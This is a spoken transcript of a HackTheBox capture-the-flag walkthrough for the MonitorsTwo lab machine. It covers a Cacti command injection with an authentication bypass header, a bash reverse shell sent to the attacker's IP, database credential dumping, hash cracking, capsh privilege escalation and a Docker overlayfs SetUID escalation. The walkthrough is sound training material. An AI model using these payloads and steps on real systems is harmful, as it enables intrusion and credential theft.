What's going on YouTube? This is Ipsec. We're doing MonitorsTwo from HackTheBox, which the exploitation was dead simple. The foothold, you exploit a Cacti instance and it gets you a shell on a Docker container, and you could use Metasploit. I don't think the Metasploit module was at time of release, but it came out shortly after. We're going to overcomplicate it a little bit and do it manually just so we understand the exploit, see what we can do when things go wrong. But with that shell, you can then pillage the database, get some credentials that are used to SSH into the box. And this is where the box starts to get tricky. There is a email that points to a vulnerability in Docker, and you actually have to go back down to the Docker container, find a privesc, which is just a GTFO bin, get root there, and then you can drop a SetUID binary there. And since the host OS is sharing the file system, you can just execute that SetUID binary and get up to root. And I called that tricky because it's very rare in a privesc where you have to go from the host system back down to a Docker to go back up to the host. But either way, let's just get into the box. As always, I'm going to start with an nmap. So -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it MonitorsTwo, then the IP address of 10.10.11.211. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx running version 1.18, also on Ubuntu. And looking at the title, we have login to Cacti, or Cacti. I don't know how to pronounce that, but let's just go over to the page. So 10.10.11.211. And we get this login banner. We can try default credentials like admin. I think maybe it's admin user or something, but the key thing is we have this version 1.2.22. So I'm going to Google Cacti 1222, and I'll just add exploit to it. And we get a heap of exploits. Now, we could just go to GitHub, and I think if we just ran this exploit, it would magically work and we'd get a shell, but we don't really learn anything through that. So I'm going to go take a step back. We're not just going to run a POC blindly. I'm going to go look at these two articles. Let's see. This one, again, is going to be code. I'm going to go to this page that has a description of the CVE, and it has a few things. So it's talking about host ID. Let's see. The module will immediately attempt exploitation. During exploitation, the module sends a GET request to remoteagent.php. So this is the script with the action parameter set to poll data and the x forwarded for header set to the provided value for x forwarded for IP, by default 127.0.0.1. In addition, the poller ID parameter is set to the payload, and the host ID and local ID are set to brute forced or provided values. So this is what a lot of the scripts do. They kind of just hard code it. And if you just use the script, you don't learn that much, right? So the first thing we're going to do is take this because it gives us the URL pretty easily. And it has these IDs and like a parameters statement, and it just brute forces it. But we're not going to use it. We're just going to cheat, get this payload, and we're going to send this over to Burp Suite, and then kind of see how this works. And we're actually going to go over to Metasploit because Metasploit's code generally explains things better, and they don't take a lot of things for granted. So if we just sent this payload, it's probably going to error out because we need to put numbers here. And since this says IDs, I'm going to guess they are integers. And maybe it didn't error. We just see you're not authorized. And if we remember, we had the x forwarded for header that the description told us to set. And it said set it to 127.0.0.1 to bypass authentication on this endpoint. So now if we send it, we just get errors. Validation error for host ID, C backtrace, and doesn't really have that much. We just get a bunch of errors. So let's just put integers for these. Since it is an ID, I'm going to do 0. We can do host ID of 0 as well. And then polar ID, I'm going to do semicolon sleep +1. This plus is URL encoded for space. And now if we send it, we just get a blank array. I'm going to increment my host ID by 1, 2, 3. We don't really get anything. If we increment this, we get data back. Do we get it back for host ID 2? No, only when host ID is 1. And I set it to 1. I generally test for 0 or 1 first. It just depends where it starts counting, right? If it starts at 0 or starts at 1. In this case, starts at 1 and the host ID is for itself. And at this point, if you don't know what Cacti is, it's a, I guess, graphing application. If we Google Cacti, go to images, you can kind of get an ID what it is. Not exploit, let's just Google Cacti, go to images, and probably have to specify software. And it takes a bunch of data from networking devices or whatnot and display as graphs. So host ID is going to be the ID of the host, and this is a really old version, but it's a monitoring application. So host ID is 1, is probably going to be itself. And then we have this piece, and we don't know exactly what it's doing. The script just brute forces it, and eventually it takes about a second to return because we have a sleep of 1. If we do a sleep of 2, we go to 2 milliseconds, right? So we can go try this one more time. That's 2 seconds. 1 is 1 second. And if we did 10, it's going to sleep for 10 seconds. So we definitely have code execution. But my gripe is if you just go off these Python modules, you'll see it just brute forces until it works. There's no logic here of it actually testing the exploit. So we run exploit. Exploit is here. We set a user agent. It's going to set it, payload. Let's see, how does it get local data ID? It's just brute forcing 1 to 100 and sending them all. So why did we get code execution on 6? We see it's 10 seconds there, but we didn't get code execution on 1. And the answer is going to be this RRD name. But if you just did it by Python scripts, you're probably out of luck. If we look at this, there is a Metasploit module. And if we Google for this and look through the actual Metasploit code, we will see exactly what is happening. So pull this up. And generally speaking, I know Metasploit's frowned upon, but whenever I see an exploit on Metasploit or just a random Python script, I'm going to choose the Metasploit version because that's generally tested more. It's kept more up to date. It has more just process around adding it. It's not just some random person committing to GitHub. And I started doing this around the time of like Eternal Blue because a lot of people like that Python script because you're not using Metasploit, so you can pass OSCP. But that has a tendency to crash the SMB service where Metasploit does not. So I like using Metasploit, especially when looking through code, even though this is chances are it's going to be Ruby. It supports other languages now, but you get an idea what it is. So we have this exploit, and it's going to brute force the IDs, kind of just like what we saw with the Python script. But if we go to this definition of brute force IDs, we'll see right now it's just setting the variables, making sure we don't do 1,000 attempts because that would just take a long time. And then it's going to enumerate, let's see, we'd send this remote agent request if we look at that. We're on line 199. But all this does is send a GET request, set the x-forwarded4 header, and send this, right? And it even says when brute forcing, this is just a random number, but exploitation, it's the payload. So let's go back up to line 199, where that was. And let's see, unexpected response. It's going to parse the body. If it is array, checking. And now it's checking the RRD value. And let's see. So we have this variable exploitable RRD names, and if it finds it in this list, then it returns true. So let's see exactly what this is. And we have these RRD names, and uptime is one of them. So there's probably going to be a few that we can actually exploit. And that's just this. So if we kept going through this, so like 7, That's proc 8, proc 10. Are these all going to be proc? 20? 30? Or 230? 240? I don't know why everything is suddenly proc. But what do we say? 6 was the exploitable. Oh, we're changing polar ID. That's why. So 7 is nothing, 8 is nothing, 6 is uptime. So I guess all these other RRDs just are not deployed for this host ID. But we got this. We have code execution. We wasted enough time talking about it, so let's just get a shell. So I'm going to go here and do bash-c, then bash-i, dev tcp 10.10.14.8, 9001, 0, and 1 like that. And then let's URL encode it. So I'm going to highlight everything and then press Control-U, and we can send a shell. So nc lvnp 9001, send this payload, and we have a shell. Let's do python 3-c, import pty spawn, bin bash, and python 3 is not in the box. Which python 2? So I don't think we have Python on this box at all. So we may have the script binary, and script we can also use to do the same thing. It's actually a little bit easier. Let's do man script real quick, just so I see the arguments. We probably want to use C, and I need out file as well. -O is out file. So I'm going to do script -O dev null. So we're not actually creating a log on the box of everything we did. Then we can do, let's see, the next command is going to be q for quiet, and then bin bash. And now I can do stty, so control Z, stty raw minus echo, fg, enter, enter. And we have a proper terminal here. I'm just going to do the rows and columns. So rows 31, columns 121, rows 31, columns 121, export term is equal to x term. So we can clear the screen. And now we just have a shell on the Cacti box. So the very first thing I always do whenever I get shell on a web application is go check out the database. So I'm going to do a find dot, and I'm just going to grep for config. And there is an include config.php, so that's probably what I want. So let's go into include, and I can grep database on config.php. And let's see, we have username root, password root. So let's do MySQL-u root -p root, and we can't connect to MySQL server through the socket. Looking up, we have a host name of DB. And at this point, I should mention we are in a Docker container. We can kind of tell we're in a container based upon the host name. If I do LSA on /, we see .dockerenv. Let's see, ping DB. Ping is not there. I'm just going to do a wget on DB. I don't expect this to work, but I'm testing for DNS. So we see it's resolving DB to this IP address, 172.19.02. So DB does exist. That, again, was in the config. So I can go back to my MySQL command, and I'm going to add a -8 for hostname. And we'll specify DB, root, and now we're logged in. So we can do a show tables, show databases. It's probably going to be Cacti, right? CD Cacti. Why do I do CD? It's use Cacti. Show tables. And we probably want the user auth. So I'm going to do a select stir from user auth, limit 1. I just want to get one ID right now. And I like using \G because if I just do semicolon, I can't read that. But \G makes this a bit more human readable. And this is why I only limit 1. So I can see each field in this. And I want username, password, name, and email address. So now I can do select username, password, full name, email address from user auth. I'm not going to do the \G because we don't have a lot of information here. And I can easily eyeball this, right? So I can just copy this, And then let's go save this. So v user auth. We can make a directory cacti v user auth, paste, and then I'm going to grep for pipe like this on user auth. Does this get me everything? It does. So I can just do an awk now, and we can say print 2. This is 1, this is 2, this is 3, this is 4. So 2:4. And then we can grep -v username to hide the first line. And we'll output that to hashes. And we have admin and Marcus. I don't know what this guest is. That just looks like hex to me. Let's see. If we go to decoder, decode as hex. I have no idea what this is. Smart decode. But I'm going to try cracking these hashes because I know what these are. So let's send those over to the Kraken, which is just a box on my network. You can always use your computer to crack. I wouldn't recommend cracking in a VM just because it's a CPU intensive process or GPU intensive, and it can go very slowly. If you just use your host operating system, definitely works. The reason I don't is because I'm recording and it may just cause me to drop frames or other things. So I just like always SSHing off my box. Let's go into this and grab the credentials, cat hashes. We can just grab these 2 lines. I'm going to v MonitorsTwo, paste this in, and then we can go /hashcat hashes MonitorsTwo. Man, I'm typing all over the place. Then opt word list rocku.txt. And it's going to auto detect the hash. It looks like it's some type of bcrypt format probably. Let's see. Oh, we have to do -- username because we had the username : the hash. So we have a few options. 2*, that's probably going to be what it is. MD5 pass, like these don't look similar, and it's form CMS e-commerce. I'm just going to guess 3200 first. So let's do -mode 3200. And I really love that Hashcat now has that auto detection feature. I know it's been like 1 to 2 years, maybe longer, but gone are the times of just always having to consult the manual when you wanted to get a mode out. Super nice. So it is now cracking. I can do S for status to see how long it's going to take. And we already got one. The password is Funky Monkey. So I'm going to do a, let's see, MonitorsTwo. Let's see, -- username. Is it -- show? -mode 3200. There we go. And we can see Marcus has the password of Funky Monkey. So let's try SSHing in with Marcus. Let's go here, SSH Marcus at 10.10.11.211. We do Funky Monkey, and we get logged in. It also tells us Marcus does have mail. I always like just reading the mail. If it's an actual environment, it's probably not going to be anything special. But if it is root, it may just be like failed logins, things like that, where you get IP addresses and things like that off of it. But if we look at it, we have an email, it looks like, from administrator@monitors2.htb to all. And we got a security bulletin. So the first one is talking about the Linux kernel before 5.11.14. If I do a uname -a, we're 5.40.147. So how Ubuntu does kernels is really annoying. Some things put it here, which is the minor number. Ubuntu likes putting 147 here. We can just look at the date of the CVE and when this was compiled to see if it is relevant. So let's copy this, go over to Firefox, Google, May 14th, and this is March 21st. So it looks vulnerable because March is the 3rd month and May is the 5th. But keep in mind, this is 2023 and this is a 2021 CVE. So this is definitely not vulnerable to the kernel provesk. Then we have this one. It mentions Cacti. I want to say we're like 1222. So this is also probably not vulnerable if we go here. But even if it is, we've already shelled this service, so it is not interesting to us. I'm not sure. Did we hang the service by getting our shell? That is weird. Okay, we'll just move on. Then we have this CVE, and this affects Docker, and it wants Docker version 2.10.9. So let's see what version of Docker we have. If I do docker -- version, where I said probably 2.10.9, it's 20.10.9, and we're 20.10.5. So we are vulnerable to this CVE. So let's do some quick research on this. So if I just Google this CVE, it's going to talk about it, and it's probably going to give us an exploit script, which we're not just going to run. The issue in this is the overlayfs permissions will traverse the host. So let's see, Docker overlayfs enables the container file system to be layered on top of the host, thus allowing the host system access to manipulate files within the container. In the case of this, the overly permissive directory permissions in varlib overlay2 enable unprivileged users to access and execute programs within the container, leading to a potential privesc. So we connect. Inside the container, we make a SetUID version bin bash, and on the host, we can execute it. So for this to work, we need to get root on this container. Because let's see, if we do, is it find mount? This is going to list where all the Docker directories are. So we have to be able to go into these directories. So let's just do a lsla on this. And this is a long directory path. This is just where the Docker is. And remember, there's two Dockers at least that we know of. There's DB and web. So we want to make sure we get on the right container. So let's go to /, and I'm going to go in temp, and we're going to touch please subscribe. So if we do this, go in temp, there's no files here. So I'm going to do find mount again, and let's go to the other one. lsla, this /temp, and we do have please subscribe. So we do have a way to get here. So if I go in this directory, or we can probably copy the bash off this, right? cp bin bash to temp. We do ls. We now have bash, and we need to make this SetUID. So let's go temp. Oh, we have to escalate privileges. So I'm going to do find / permission -4000, hide all error messages. And looking at the SetUID binaries, we have CapSH. And if we did a GTFO bins, and I'm sure like linps and all these things will highlight this binary. If we look at it, we have CapSH, and we can set GID UID to 0 and -- which will break out of bash. So we can just do CapSH -- UID equals 0 -- GID equals 0, and then -- and now we are magically root. The purpose of CapSH, let's see. Let's just do man CapSH. See exactly what it is. Linux capability support to, let's see. It's a testing tool, I guess, but it's a legitimate tool. So now that we are root, if we go to temp, we have bash. So let's do chown root on bash. And now when I do lsla on this directory, we have bash owned by root. So you can see where this is going. Let's do chmod 4755, which will set this to be a SetUID executable on bash. And over here, again, the same thing. And now we have this as a SetUID. So let's just go into this directory now. And then we can execute bash with -p. So it accepts her privilege, and we can see our effective user ID is 0, which is root. So if I do cd/root, we can now get root.txt. So that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.